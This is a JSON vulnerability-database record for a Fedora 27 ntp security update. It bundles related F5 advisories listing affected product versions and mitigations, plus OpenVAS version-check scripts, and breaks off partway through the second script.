{"id": "FEDORA:8746560A764C", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 27 Update: ntp-4.2.8p11-1.fc27", "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "published": "2018-03-27T20:16:30", "modified": "2018-03-27T20:16:30", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "lastseen": "2020-12-21T08:17:54", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K65271605", "F5:K82570157", "F5:K51743312", "F5:K38742515", "F5:K13540723", "F5:K04912972", "SOL65271605"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201210", "OPENVAS:1361412562310874283", "OPENVAS:1361412562310843586", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562310812790", "OPENVAS:1361412562310812792", "OPENVAS:1361412562310812791", "OPENVAS:1361412562310875100", "OPENVAS:1361412562310812793", "OPENVAS:1361412562311220192215"]}, {"type": "freebsd", "idList": ["AF485EF4-1C58-11E8-8477-D05099C0AE8C"]}, {"type": "archlinux", "idList": ["ASA-201803-11"]}, {"type": "nessus", "idList": ["SUSE_SU-2018-1765-2.NASL", "SLACKWARE_SSA_2018-060-02.NASL", "GENTOO_GLSA-201805-12.NASL", "NTP_4_2_8P11.NASL", "FREEBSD_PKG_AF485EF41C5811E88477D05099C0AE8C.NASL", "SUSE_SU-2018-1765-1.NASL", "OPENSUSE-2018-376.NASL", "SUSE_SU-2018-1464-1.NASL", "SUSE_SU-2018-0956-1.NASL", "SUSE_SU-2018-0808-1.NASL"]}, {"type": "fedora", "idList": ["FEDORA:B80B9607548F", "FEDORA:D24F26076D26", "FEDORA:D00D36075DA4", "FEDORA:B6F06606E5A6"]}, {"type": "slackware", "idList": ["SSA-2018-229-01", "SSA-2018-060-02"]}, {"type": "gentoo", "idList": ["GLSA-201805-12"]}, {"type": "amazon", "idList": ["ALAS-2018-1009", "ALAS-2018-1083", "ALAS2-2018-1009"]}, {"type": "aix", "idList": ["NTP_ADVISORY10.ASC", "NTP_ADVISORY11.ASC"]}, {"type": "cve", "idList": ["CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7185", "CVE-2018-7183", "CVE-2016-1549", "CVE-2018-7184"]}, {"type": "symantec", "idList": ["SMNTC-103339", "SMNTC-1451"]}, {"type": "ubuntu", "idList": ["USN-4563-1", "USN-3707-1", "USN-3707-2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:395B2EFFF922C38DE193A0DDFFA06D6E"]}, {"type": "seebug", "idList": ["SSV:96788"]}, {"type": "talos", "idList": ["TALOS-2016-0083"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:89AFE2575D3AAEFB0E0D6881A13995A5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150341"]}, {"type": "exploitdb", "idList": ["EDB-ID:45846"]}, {"type": "zdt", "idList": ["1337DAY-ID-31596"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3452-1", "OPENSUSE-SU-2018:3438-1"]}], "modified": "2020-12-21T08:17:54", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-12-21T08:17:54", "rev": 2}, "vulnersScore": 6.4}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "27", "arch": "any", "packageName": "ntp", "packageVersion": "4.2.8p11", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"f5": [{"lastseen": "2019-09-30T20:28:25", "bulletinFamily": "software", "cvelist": ["CVE-2018-7170", "CVE-2016-1549"], "description": "\nF5 Product Development has assigned ID 710387 (BIG-IP), ID 710554 (BIG-IQ), and ID 710553 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H82570157 on the **Diagnostics** > **Identified** > **Low** page. \n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.1.0 \n13.0.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.6.3 \n11.5.1 - 11.5.5 \n11.2.1 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \nF5 iWorkflow | 2.x | 2.0.1 - 2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n**Note**: For details about how Security Advisory articles are versioned, and what versions are listed in the table, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\n \nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-03-28T00:39:00", "published": "2018-03-19T19:32:00", "id": "F5:K82570157", "href": "https://support.f5.com/csp/article/K82570157", "title": "NTP vulnerability CVE-2018-7170", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-11-13T23:21:22", "bulletinFamily": "software", "cvelist": ["CVE-2018-7185"], "description": "\nF5 Product Development has assigned ID 713558 (BIG-IP), ID 713694 (BIG-IQ and iWorkflow), ID 713693 (Enterprise Manager), and ID CPF-24832, CPF-24833, and CPF-24834 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H04912972 on the **Diagnostics** > **Identified** > **Low** page. \n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.0.0 - 13.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.5.1 - 11.6.3 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \n4.x | 4.0.5 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nThere is no mitigation. However, F5 recommends that you configure multiple time sources, and restrict access to the network segments that are used to communicate with the NTP peer to avoid spoofed traffic.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n", "edition": 1, "modified": "2018-04-18T02:37:00", "published": "2018-04-10T10:41:00", "id": "F5:K04912972", "href": "https://support.f5.com/csp/article/K04912972", "title": "NTP vulnerability CVE-2018-7185", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-09-19T18:27:23", "bulletinFamily": "software", "cvelist": ["CVE-2018-7183"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-03-12T20:07:00", "published": "2018-03-12T20:07:00", "id": "F5:K51743312", "href": "https://support.f5.com/csp/article/K51743312", "title": "NTP vulnerability CVE-2018-7183", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-18T20:27:05", "bulletinFamily": "software", "cvelist": ["CVE-2018-7182"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-03-12T20:02:00", "published": "2018-03-12T20:02:00", "id": "F5:K38742515", "href": "https://support.f5.com/csp/article/K38742515", "title": "NTP vulnerability CVE-2018-7182", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-07T18:28:56", "bulletinFamily": "software", "cvelist": ["CVE-2016-1549"], "description": "\nF5 Product Development has assigned ID 591985 (BIG-IP), ID 594057 (BIQ-IQ), ID 594059 (Enterprise Manager), and ID 507785 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H65271605 on the **Diagnostics** &gt; **Identified** &gt; **Low** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP AAM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 | None | Low | ntpd \nBIG-IP AFM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.3.0 - 11.6.3 | None | Low | ntpd \nBIG-IP Analytics | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 | None | Low | ntpd \nBIG-IP APM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP ASM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP DNS | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | None | Low | ntpd \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP GTM | 11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP Link Controller | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP PEM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.3.0 - 11.6.3 | None | Low | ntpd \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | Low | ntpd \nARX | 6.0.0 - 6.4.0 | None | Low | ntpd \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ntpd \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ntpd \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ntpd \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ntpd \nBIG-IQ ADC | 4.5.0 | None | Low | ntpd \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ntpd \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ntpd \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 MobileSafe | None | 1.0.0 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, if configured, disable trustedkey authentication for NTP and/or ensure that the private key is known only to trusted hosts. Additionally, you can configure multiple time sources to mitigate the risk of any single time source being impacted by this attack.\n\n**Impact of action:** Performing the suggested action should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [NTP FAQ - Advanced Configuration](<http://www.ntp.org/ntpfaq/NTP-s-config-adv.htm>) \n \n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n", "edition": 1, "modified": "2018-04-02T21:46:00", "published": "2016-06-13T20:07:00", "id": "F5:K65271605", "href": "https://support.f5.com/csp/article/K65271605", "title": "NTP vulnerability CVE-2016-1549", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2016-09-26T17:23:26", "bulletinFamily": "software", "cvelist": ["CVE-2016-1549"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, if configured, disable trustedkey authentication for NTP and/or ensure that the private key is known only to trusted hosts. Additionally, you can configure multiple time sources to mitigate the risk of any single time source being impacted by this attack.\n\n**Impact of action:** Performing the suggested action should not have a negative impact on your system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * [NTP FAQ - Advanced Configuration](<http://www.ntp.org/ntpfaq/NTP-s-config-adv.htm>) \n \n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n", "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "SOL65271605", "href": "http://support.f5.com/kb/en-us/solutions/public/k/65/sol65271605.html", "type": "f5", "title": "SOL65271605 - NTP vulnerability CVE-2016-1549", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-25T19:33:59", "bulletinFamily": "software", "cvelist": ["CVE-2018-7184", "CVE-2015-7704"], "description": "\nF5 Product Development has assigned ID 709048 (BIG-IP), ID 709180 (BIG-IQ), ID 709179 (Enterprise Manager), and ID CPF-24829, CPF-24830, and CPF-24831 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H13540723 on the **Diagnostics** &gt; **Identified** &gt; **Low** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.0.0 - 13.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.6.1 - 11.6.3 \n11.5.1 - 11.5.6 \n11.2.1 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \nF5 iWorkflow | 2.x | 2.0.1 - 2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n4.x | 4.0.5 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can use server mode instead of peer mode, enable peer authentication, configure multiple time sources, and/or restrict access to the network segments that are used to communicate with the NTP peer to avoid spoofed traffic.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-05-03T02:33:00", "published": "2018-03-26T19:24:00", "id": "F5:K13540723", "href": "https://support.f5.com/csp/article/K13540723", "title": "NTP vulnerability CVE-2018-7184", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-28T00:00:00", "id": "OPENVAS:1361412562310874283", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874283", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2018-de113aeac6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_de113aeac6_ntp_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ntp FEDORA-2018-de113aeac6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874283\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-28 08:57:55 +0200 (Wed, 28 Mar 2018)\");\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\",\n \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2018-de113aeac6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-de113aeac6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAWSWGYT4BYAU6JMQXZOD22NFWPCVJQP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.8p11~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-12327", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-09-27T00:00:00", "id": "OPENVAS:1361412562310875100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875100", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2018-7051d682fa", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7051d682fa_ntp_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ntp FEDORA-2018-7051d682fa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 